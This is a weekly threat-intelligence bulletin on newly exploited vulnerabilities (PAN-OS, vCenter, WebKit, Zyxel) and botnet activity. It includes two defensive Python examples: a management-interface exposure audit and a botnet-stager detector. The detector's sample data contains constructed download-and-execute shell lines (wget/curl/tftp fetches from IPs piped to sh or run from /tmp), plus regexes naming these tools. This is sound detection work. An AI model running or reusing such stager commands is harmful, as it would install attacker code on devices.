Executive Summary
CISA has added eight new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog this week, including critical flaws in software from Apple, VMware, and Palo Alto Networks, underscoring the urgency of swift mitigation across these platforms.
Apple has addressed two critical zero-day vulnerabilities actively exploited in the wild, while Palo Alto Networks attributes a key flaw to "Operation Lunar Peek," without disclosing details about the attackers. Meanwhile, Sekoia’s TDR team has identified a Linux variant of Helldown ransomware exploiting a vulnerability in Zyxel firewalls to establish initial access.
The IoT_Reaper botnet remains active, exploiting vulnerabilities in MVPower CCTV DVRs to maintain its foothold in the current threat landscape. Zerobot has shifted its attention to a three-year-old vulnerability in the Apache HTTP Server. In parallel, other persistent botnets such as Enemybot, LiquorBot, and Mirai continue to target a nine-year-old flaw in D-Link DIR-645 routers. These activities underscore a significant trend: long-standing vulnerabilities remain prime targets for cybercriminals, and outdated, unpatched systems remain at risk even as threats evolve.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, supporting informed prioritization decisions.
A critical authentication bypass vulnerability in PAN-OS (CVE-2024-0012, CVSS 9.8), now included in the CISA Known Exploited Vulnerabilities (KEV) catalog, enables attackers with network access to the management web interface to obtain administrator privileges without authenticating. The flaw stems from missing authentication for a critical function, allowing an unauthenticated attacker to perform administrative actions, modify the configuration, or exploit related privilege escalation vulnerabilities such as CVE-2024-9474.
A command injection vulnerability in PAN-OS (CVE-2024-9474) enables an administrator with access to the management web interface to escalate privileges and execute commands on the firewall as root. While Palo Alto Networks has not explicitly linked CVE-2024-0012 and CVE-2024-9474, the available details suggest that the two can be chained: the authentication bypass yields administrator access, and the command injection turns that access into root-level command execution. This vulnerability has also been added to the CISA KEV catalog, underscoring its severity.
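The precondition for this chain is network reachability of the management web interface, so the first check a defender wants is whether anything outside the intended allowlist has been reaching it. As an added example (not Palo Alto Networks' code or guidance), the following Python script audits constructed flow-log lines for connections to a firewall's management services from untrusted sources. The log format, the management address, the service ports and the trusted ranges are all assumptions for illustration.

```python
import ipaddress
import re

# Constructed flow-log lines (not real telemetry) in a hypothetical
# "src=... dst=... dport=... proto=..." format.
SAMPLE_FLOW_LOG = """\
src=10.0.0.50 dst=10.0.0.1 dport=443 proto=tcp
src=10.10.5.7 dst=10.0.0.1 dport=443 proto=tcp
src=198.51.100.23 dst=10.0.0.1 dport=443 proto=tcp
src=198.51.100.23 dst=10.0.0.1 dport=22 proto=tcp
src=203.0.113.9 dst=192.0.2.80 dport=443 proto=tcp
src=10.0.0.50 dst=10.0.0.1 dport=53 proto=udp
"""

# Assumed management address, management service ports (web UI and SSH)
# and the only networks that are supposed to reach them.
MGMT_ADDRESS = ipaddress.ip_address("10.0.0.1")
MGMT_PORTS = {443, 22}
TRUSTED_SOURCES = [ipaddress.ip_network(n) for n in ("10.0.0.0/24", "10.10.5.0/24")]

FLOW_RE = re.compile(r"src=(\S+) dst=(\S+) dport=(\d+)")


def parse_flows(text):
    """Yield (src, dst, dport) from flow-log lines; lines that do not match are skipped."""
    for line in text.splitlines():
        m = FLOW_RE.search(line)
        if m:
            yield (ipaddress.ip_address(m.group(1)),
                   ipaddress.ip_address(m.group(2)),
                   int(m.group(3)))


def is_trusted(src, trusted=TRUSTED_SOURCES):
    """True if the source address falls inside one of the allowlisted networks."""
    src = ipaddress.ip_address(src)
    return any(src in net for net in trusted)


def untrusted_mgmt_hits(text, mgmt=MGMT_ADDRESS, ports=MGMT_PORTS, trusted=TRUSTED_SOURCES):
    """Return (src, dport) for every flow that reached a management service from outside the allowlist."""
    hits = []
    for src, dst, dport in parse_flows(text):
        if dst == mgmt and dport in ports and not is_trusted(src, trusted):
            hits.append((str(src), dport))
    return hits


def exposure_summary(text, mgmt=MGMT_ADDRESS):
    """Summarize exposure: is the mgmt address itself routable, and who reached it from outside."""
    hits = untrusted_mgmt_hits(text, mgmt)
    return {
        "mgmt_address_is_public": mgmt.is_global,
        "untrusted_sources": sorted({src for src, _ in hits}),
        "untrusted_hits": len(hits),
    }


if __name__ == "__main__":
    for src, port in untrusted_mgmt_hits(SAMPLE_FLOW_LOG):
        print(f"management port {port} reached from untrusted {src}")
    print(exposure_summary(SAMPLE_FLOW_LOG))
```

Any hit from an untrusted source is a finding regardless of whether the login succeeded, because the authentication bypass removes the login step; the fix is to restrict management access to trusted internal addresses before patching windows open.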
Progress Kemp LoadMaster is affected by a critical command injection vulnerability (CVSS 10.0) that allows unauthenticated attackers to compromise the management interface and, with it, the confidentiality and integrity of the system. The vulnerability is now listed in the CISA KEV catalog, and a publicly available proof-of-concept (PoC) exploit raises the risk further, making immediate patching a priority.
Citrix Session Recording Storage Manager is affected by a privilege escalation to NetworkService account access and by a limited remote code execution with the privileges of the NetworkService account. watchTowr Labs reported the flaws, and a proof-of-concept (PoC) exploit is now available, increasing the urgency of remediation.
A critical pre-authentication command injection vulnerability (CVSS 9.8) in GeoVision devices is being actively exploited by a botnet, which uses the compromised devices for large-scale DDoS attacks and cryptomining. End-of-life models are particularly targeted.
A critical heap overflow vulnerability (CVSS 9.8) in VMware vCenter Server and VMware Cloud Foundation enables attackers with network access to achieve remote code execution by sending specially crafted packets. This issue affects versions 8.0U3a and earlier and has been included in the CISA Known Exploited Vulnerabilities (KEV) catalog.
A critical privilege escalation flaw in VMware vCenter Server and VMware Cloud Foundation (CVSS 9.8) allows attackers with network access to gain root-level privileges by sending specially crafted network packets. This vulnerability also affects versions 8.0U3a and earlier and has been included in the CISA KEV catalog.
CVE-2024-44308 and CVE-2024-44309
Apple has resolved two actively exploited zero-day vulnerabilities reported as exploited against Intel-based Mac systems: CVE-2024-44309, a cross-site scripting vulnerability in Safari's WebKit engine, and CVE-2024-44308, an arbitrary code execution vulnerability in JavaScriptCore. Both were discovered and reported by Google's Threat Analysis Group (TAG) and have been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.
A high-severity incorrect authorization vulnerability (CVSS 7.5) in the Oracle Agile Product Lifecycle Management (PLM) Framework enables unauthenticated remote attackers to reach the flaw over HTTP or HTTPS and potentially disclose files. This issue affects version 9.3.6 and has been included in the CISA KEV catalog.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Vulnerabilities identified as exploited by botnets, including recent CVEs logged in MISP. The top 5 CVEs are presented whose payloads are suggestive of botnet activity, such as using wget to fetch a stage from a bare IP address.
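To make the wget-with-IP heuristic concrete, here is an added Python example (not Loginsoft's pipeline code) that scores decoded payloads for botnet stager behaviour and ranks the rules that fired. It goes slightly beyond the paragraph by also catching curl, tftp and busybox-prefixed fetches and by requiring a follow-on execution step, so that a plain hostname download or a bare login probe does not count. The records, rule tags, addresses and payload strings are all constructed for illustration.

```python
import re
from collections import Counter

# Constructed sensor records (not real Cytellite telemetry). Each is
# (source_ip, rule_tag, decoded_payload); the rule tags are hypothetical
# signature names standing in for the CVE column the table would show.
SAMPLE_RECORDS = [
    ("198.51.100.23", "mvpower-dvr-rce",
     "cd /tmp; wget http://203.0.113.5/bins/mips -O .x; chmod +x .x; ./.x dvr"),
    ("198.51.100.23", "mvpower-dvr-rce",
     "cd /tmp; wget http://203.0.113.5/bins/arm7 -O .x; chmod +x .x; ./.x dvr"),
    ("203.0.113.77", "apache-httpd-traversal",
     "cd /tmp || cd /var/run; curl -O http://198.51.100.9/x86; chmod 777 x86; ./x86 apache"),
    ("192.0.2.14", "dlink-dir645-rce",
     "busybox wget http://192.0.2.200/d -O /tmp/d; sh /tmp/d"),
    ("192.0.2.15", "dlink-dir645-rce",
     "tftp -g -r bin.sh 192.0.2.200 && sh bin.sh"),
    ("192.0.2.16", "web-login-probe",
     "GET /login HTTP/1.1"),                       # scan only, no stager
    ("192.0.2.17", "mvpower-dvr-rce",
     "wget http://203.0.113.5/bins/x86 -O- | sh"),
    ("192.0.2.18", "generic-script-fetch",
     "curl http://updates.example.com/check.sh | sh"),  # hostname, not a bare IP
]

# A fetch tool followed, before any command separator, by a dotted-quad IPv4 address.
DOWNLOADER = re.compile(
    r"\b(?:busybox\s+)?(?:wget|curl|tftp|ftpget)\b[^;&|]*?\b(\d{1,3}(?:\.\d{1,3}){3})\b")
# Typical second stage: make executable, run it, or pipe the download into a shell.
EXEC_STAGE = re.compile(r"chmod\s+(?:\+x|[0-7]{3,4})|\bsh\s+\S|\./\S|\|\s*sh\b")
# Stagers usually change into a writable scratch directory first.
TMP_CWD = re.compile(r"\bcd\s+/(?:tmp|var/run|var/tmp|dev/shm)\b")


def botnet_indicators(payload):
    """Return the individual indicators observed in one decoded payload."""
    m = DOWNLOADER.search(payload)
    return {
        "downloader_with_ip": m is not None,
        "stage_server": m.group(1) if m else None,
        "exec_stage": EXEC_STAGE.search(payload) is not None,
        "tmp_cwd": TMP_CWD.search(payload) is not None,
    }


def is_botnet_like(payload):
    """A payload counts as a botnet stager if it fetches from a bare IP and then stages or runs it."""
    ind = botnet_indicators(payload)
    return ind["downloader_with_ip"] and (ind["exec_stage"] or ind["tmp_cwd"])


def top_botnet_rules(records, n=5):
    """Rank rule tags by how many botnet-like payloads hit them (the report's top-5 table)."""
    counts = Counter(tag for _, tag, payload in records if is_botnet_like(payload))
    return counts.most_common(n)


def stage_servers(records):
    """Distinct payload-hosting IPs seen in botnet-like records, useful as blocklist candidates."""
    return sorted({botnet_indicators(p)["stage_server"]
                   for _, _, p in records if is_botnet_like(p)})


if __name__ == "__main__":
    for tag, count in top_botnet_rules(SAMPLE_RECORDS):
        print(f"{count:3d}  {tag}")
    print("stage servers:", ", ".join(stage_servers(SAMPLE_RECORDS)))
```

The bare-IP requirement is deliberate: IoT stagers almost never use DNS, so a fetch from a hostname is left for manual review rather than counted, and the execution-step requirement keeps a lone download probe from inflating the ranking.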
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.
Palo Alto Networks has linked exploitation of this PAN-OS vulnerability to an operation it has named "Operation Lunar Peek"; details about the threat actor behind the attacks remain undisclosed. The company has shared several indicators of compromise (IoCs), including IP addresses and the hash of a PHP webshell payload found on compromised firewalls. Notably, much of the activity has been traced to IP addresses associated with anonymous VPN services.
A high-severity command injection vulnerability (CVSS 8.1) in the IPSec VPN feature of affected Zyxel firewall firmware versions allows unauthenticated attackers to execute arbitrary OS commands by sending a crafted username to the target device. Sekoia’s Threat Detection & Research (TDR) team has identified the Linux variant of Helldown ransomware leveraging this vulnerability to gain initial access.
PRE-NVD observed for this week
This section covers vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database (NVD). The LOVI platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.
External References
- https://www.cisa.gov/news-events/alerts/2024/11/18/cisa-adds-three-known-exploited-vulnerabilities-catalog
- https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
- https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-network-access-citrix-virtual-apps-and-desktops-cve-unknown/
- https://www.darkreading.com/cloud-security/citrix-patches-zero-day-recording-manager-bugs
- https://www.cisa.gov/news-events/alerts/2024/11/21/cisa-adds-three-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2024/11/20/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-vmware-vcenter-server-now-exploited-in-attacks/
- https://thehackernews.com/2024/11/apple-releases-urgent-updates-to-patch.html
- https://blog.sekoia.io/helldown-ransomware-an-overview-of-this-emerging-threat/